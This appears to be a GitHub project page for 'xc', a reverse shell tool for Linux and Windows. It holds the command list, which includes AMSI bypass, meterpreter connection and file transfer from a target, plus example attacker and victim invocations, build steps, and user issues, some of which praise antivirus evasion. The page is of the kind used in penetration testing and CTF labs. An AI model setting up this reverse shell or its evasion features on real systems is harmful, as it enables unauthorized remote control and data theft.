
xc's Introduction

XC

Netcat like reverse shell for Linux & Windows.

Features

Windows

Usage:
└ Shared Commands:  !exit
  !upload <src> <dst>
   * uploads a file to the target
  !download <src> <dst>
   * downloads a file from the target
  !lfwd <localport> <remoteaddr> <remoteport>
   * local portforwarding (like ssh -L)
  !rfwd <remoteport> <localaddr> <localport>
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd <index>
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin <plugin>
   * execute a plugin
  !spawn <port>
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas <username> <password> <domain>
   * restart xc with the specified user
  !met <port>
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
  !powershell
    * starts powershell with AMSI Bypass
  !rc <port>
    * connects to a local bind shell and restarts this client over it
  !runasps <username> <password> <domain>
    * restart xc with the specified user using powershell
  !vulns
    * checks for common vulnerabilities

Linux

Usage:
└ Shared Commands:  !exit
  !upload <src> <dst>
   * uploads a file to the target
  !download <src> <dst>
   * downloads a file from the target
  !lfwd <localport> <remoteaddr> <remoteport>
   * local portforwarding (like ssh -L)
  !rfwd <remoteport> <localaddr> <localport>
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd <index>
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin <plugin>
   * execute a plugin
  !spawn <port>
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas <username> <password> <domain>
   * restart xc with the specified user
  !met <port>
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
 !ssh <port>
   * starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • Windows Victim: xc.exe 10.10.14.4 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running Go 1.15 or later; older versions will not compile. I tested it on Ubuntu (go version go1.16.2 linux/amd64) and Kali (go version go1.15.9 linux/amd64).

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
GO111MODULE=off go get github.com/libp2p/go-reuseport
sudo apt-get install rlwrap upx

Linux:

python3 build.py

Credits

xc's People

Contributors

clubby789, jazzpizazz, oh6hay, tomikoski, xct

xc's Issues

issues with keywords '!download' and '!lfwd'...

Hello,

File: server/server.go Line: 147 , func handleCmd
case utils.Bake("/jyVgMchLLo="):
is equivalent to:
case "download"
the code under the 'case' never runs.
The correct code is:
case "!download":
In obfuscated code, it will be:
case utils.Bake("uzeNmcUiIr9d"):

Same typo with
File: server/server.go Line: 152 , func handleCmd
case utils.Bake("9jWVig=="):
is equivalent to:
case "lfwd"
The correct code is:
case "!lfwd":
In obfuscated code, it will be:
case utils.Bake("uz+Emc8="):

My env: Debian 11, golang 1.17.4, xc server & xc client on the same host.
Thanks for your work. It shows how to use the hashicorp/yamux library efficiently.
Regards

PS: my small and dirty tool is attached to this issue

xc_toolbis.go.txt

[Linux] - cannot spawn another client

On the box you created, named Agile, I tried to spawn another client, but it failed, complaining about permissions as follows:

[xc: /home/corum]: !spawn 1234
[xc: /home/corum]: /bin/sh: 1: /dev/shm/otZIatiz: Permission denied

[xc: /home/corum]: !spawn 4545
[xc: /home/corum]: /bin/sh: 1: /dev/shm/QpfqVeYj: Permission denied

[xc: /home/corum]: ls -la /dev/shm
total 10864
drwxrwxrwt  2 root  root      120 Jul 24 13:12 .
drwxr-xr-x 17 root  root     3920 Jul 24 12:36 ..
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 QpfqVeYj
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 RDrueXsW
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 iHkXeDxO
-rw-r--r--  1 corum corum 2779280 Jul 24 13:12 otZIatiz

Love your work and the videos!
Cheers
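
A defender-side check related to the listing above, as an added Go example that is not part of the issue or of the xc code base: it reads a mount table in /proc/mounts format to see whether /dev/shm carries the noexec option, and lists regular files in a directory that start with the ELF magic. The function names HasMountOption and FindELF are hypothetical.

```go
package main
import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// HasMountOption reports whether the last /proc/mounts-style entry for mountpoint carries option.
func HasMountOption(table, mountpoint, option string) bool {
	found := false
	for _, line := range strings.Split(table, "\n") {
		f := strings.Fields(line)
		if len(f) >= 4 && f[1] == mountpoint { // a later mount overrides earlier ones
			found = strings.Contains(","+f[3]+",", ","+option+",")
		}
	}
	return found
}

// FindELF lists regular files directly under dir that begin with the ELF magic.
func FindELF(dir string) (hits []string, err error) {
	entries, err := os.ReadDir(dir)
	if err != nil {
		return nil, err
	}
	for _, e := range entries {
		if !e.Type().IsRegular() {
			continue // skip directories, FIFOs, sockets, symlinks
		}
		fh, openErr := os.Open(filepath.Join(dir, e.Name()))
		if openErr != nil {
			continue // not readable by this user
		}
		magic := make([]byte, 4)
		n, _ := fh.Read(magic)
		fh.Close()
		if string(magic[:n]) == "\x7fELF" {
			hits = append(hits, fh.Name())
		}
	}
	return hits, nil
}

func main() {
	mounts, _ := os.ReadFile("/proc/mounts") // empty on non-Linux hosts
	fmt.Println("/dev/shm noexec:", HasMountOption(string(mounts), "/dev/shm", "noexec"))
	fmt.Println(FindELF("/dev/shm"))
}
```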

Failed to build project.

Not sure how to build this project. Tried using make; see below. Go is of course installed and I have all the dependencies.

kali@kali:/xc$ ls
client files gen.py load.go Makefile meter plugins README.md scripts server shell utils vulns xc.go
kali@kali:/xc$ sudo make
rm files/keys/host*
rm files/keys/key*
mkdir -p files/keys
yes 'y' | ssh-keygen -t ed25519 -f files/keys/key -q -N ""
yes 'y' | ssh-keygen -f host_dsa -N '' -t dsa -f files/keys/host_dsa -q -N ""
yes 'y' | ssh-keygen -f host_rsa -N '' -t rsa -f files/keys/host_rsa -q -N ""
rm -f xc xc.exe shell/keys.go meter/sc.go
go generate
make: go: No such file or directory
make: *** [Makefile:14: generate] Error 127

Support `tea` magic?

I came across your fantastic library because it was recently added to tea. That got me thinking, it would be great if xc were aware of tea somehow and could grab a binary on the fly.

Passing through signals to subprograms

Currently signals are just ignored completely. Since there are some programs (pspy64s) that cannot be exited without ctrl+c or other signals, it might be a good idea to instead pass them through to any subprograms.

Port forwards issues after session reconnection

Hello!

The forwards configured in a disconnected session are still visible in the automatically reestablished session (using !lsfwd) but aren't functional (no port actually opened on the host).

An index out of range error also arises while attempting to remove forwards that were configured through a disconnected then automatically reestablished session:

image

The xc binaries were built from sources (build: JLBKqkmIkIWRmmJF).

(There is also no out-of-bounds check in !rmfwd, and the same error arises if an out-of-range index is specified in a normal setting.)
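
A bounds-checked removal for the case reported above, as an added Go example that is not xc's own code: the index typed by the user is validated before the slice is touched, and the table is cleared when a session is re-established so the listing cannot show forwards that are no longer open. The Forward and Table types and their methods are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
)

// Forward is a hypothetical record for one port forward; Close releases its listener.
type Forward struct {
	Desc  string
	Close func()
}

// Table holds the forwards that belong to the current session.
type Table struct{ Fwds []Forward }

var ErrIndex = errors.New("forward index out of range")

// Remove validates a user-supplied index before touching the slice, so bad
// input yields an error instead of an index-out-of-range panic.
func (t *Table) Remove(arg string) error {
	i, err := strconv.Atoi(arg)
	if err != nil {
		return fmt.Errorf("index %q is not a number", arg)
	}
	if i < 0 || i >= len(t.Fwds) {
		return fmt.Errorf("%w: %d (table has %d)", ErrIndex, i, len(t.Fwds))
	}
	t.Fwds[i].Close()
	t.Fwds = append(t.Fwds[:i], t.Fwds[i+1:]...)
	return nil
}

// Reset runs when a session is re-established: entries of the old session
// are closed and dropped so the listing never shows forwards that are not open.
func (t *Table) Reset() {
	for _, f := range t.Fwds {
		f.Close()
	}
	t.Fwds = nil
}

func main() {
	// Constructed sample entry, for illustration only.
	t := &Table{Fwds: []Forward{{Desc: "constructed sample entry", Close: func() {}}}}
	fmt.Println(t.Remove("5")) // out of range: error, no panic
	fmt.Println(t.Remove("0")) // valid index: entry closed and removed
}
```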

!VULN needs AMSI bypass before running

I've been testing this out - love it! This is more of a feature request, but the !vuln plugin script gets picked up by AMSI - was wondering if you could implement to run an AMSI bypass first, then run this script?

Perhaps it's already doing this, but getting picked up because it's dropped to the file system?

Problem with paths containing blank spaces

Hi,

I'm having some trouble moving into paths containing spaces. I'm not sure where the problem arises, but there is a difference between the physical cmd and the remote one using xc. As an example, I cannot access paths containing blank spaces. I've tried some different approaches and directories, but in the end the result is always the same. I attach evidence of this.

image

Thanks for your tool, still not detected by some AVs which is great,
Regards.
